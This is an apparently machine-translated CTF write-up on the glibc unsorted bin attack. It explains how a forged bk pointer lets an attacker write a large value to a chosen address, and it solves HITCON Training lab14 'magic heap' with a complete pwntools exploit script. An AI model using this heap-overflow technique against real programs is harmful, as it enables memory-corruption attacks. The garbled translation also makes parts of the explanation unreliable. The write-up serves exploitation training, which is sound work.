When the program malloc, if can not find a corresponding chunk size in fastbin, small bin, it will try to find a chunk from the unsorted Bin. If the chunk size is just taken out to meet, it will be directly returned to the user, otherwise these chunk are respectively inserted into the corresponding bin.
Premise unsorted Bin Attack is unsorted Bin Chunk of bk pointer controlled
We can modify the BK (under the chunk pointing to a linked list) of addr-2 * size (size is a unit size, 32/64 program 4/8)
To change the value of the address addr, any address modification can be achieved, but only modified to a large value
Why is addr-2 * size
A complete chunk
We can construct a fake
If we modify a chunk of the list bk point to addr-2 * size is prev_size
Addr corresponds to a position would then fd
When we put on a chunk away (in fact, is the last unsorted bin inside, we modify bk, constructed a fake thereafter,), unsorted bin in turn will update the fake chunk is updated to a larger fd value
unsorted bin mechanism is FIFO that is first in first out
The new chunk on the chain's first location, the time taken from the end of the chain traversing until you find the chunk size in line with, or traversed
Traversed chunk, if not selected use, will be transferred to the appropriate bin (that is sorted a)
unsorted bin and other similar bin, can be seen as having a classification, the symbolic significance of the chunk
It can be seen here chunk of fd pointer no use, but this could undermine the list unsorted bin, if adding a new chunk to the unsorted bin, an error will occur
So fake chunk of fd (addr) will be updated to point to the address of a chunk
Because of unsorted bin bk points to a fake chunk chunk chunk of it will not be traversed false
Then discuss something of size
size must be a multiple of 2 * SIZE_SZ (SIZE_SZ program in 32/64 4/8)
Is not satisfied by an integer multiple of the size smaller than the maximum size and an integer multiple of the processing
Whether it does not affect the low three bytes of program size 32 or 64 for the size and size have special meaning
They are represented by high to low:
NON_MAIN_ARENA, whether or not to record the current chunk main thread, not represented 1, 0 belongs.
IS_MAPPED, record whether the current chunk allocated by mmap.
PREV_INUSE, before recording whether a chunk is allocated block. In general, the stack size field of the first block of memory is allocated will be the P bit set to 1, in order to prevent illegal access to the front of the memory.
topic
HITCON Training lab14 magic heap
The target value is changed to greater than 0x1305 magic
You can modify the size and edit
When all the bin which are not in line with the chunk, the program will split chunk corresponding size from inside topchunk
So at the beginning of the program we get continuous application chunk chunk of address should be continuous
Further modifications can be all of the content of a chunk size, content to modify the release position adjacent to the chunk
from pwn import * io = process('./mag') def add(size, content): io.recvuntil(":") io.sendline("1") io.recvuntil(":") io.sendline(str(size)) io.recvuntil(":") io.sendline(content) def edit(idx, size, content): io.recvuntil(":") io.sendline("2") io.recvuntil(":") io.sendline(str(idx)) io.recvuntil(":") io.sendline(str(size)) io.recvuntil(":") io.sendline(content) def cut(idx): io.recvuntil(":") io.sendline("3") io.recvuntil(":") io.sendline(str(idx)) add(0x20,'0x20') # 0 add(0x80,'0x80') # 1 add(0x20,'0x20') # 2 cut(1) prev_size=0 size=0x91 fd=0 bk=0x6020C0-0x10 payload='A'*0x20+p64(prev_size)+p64(size)+p64(fd)+p64(bk) edit(0,0x20*2,payload) add(0x80,'0x80') io.recvuntil(":") io.sendline("4869") io.interactive()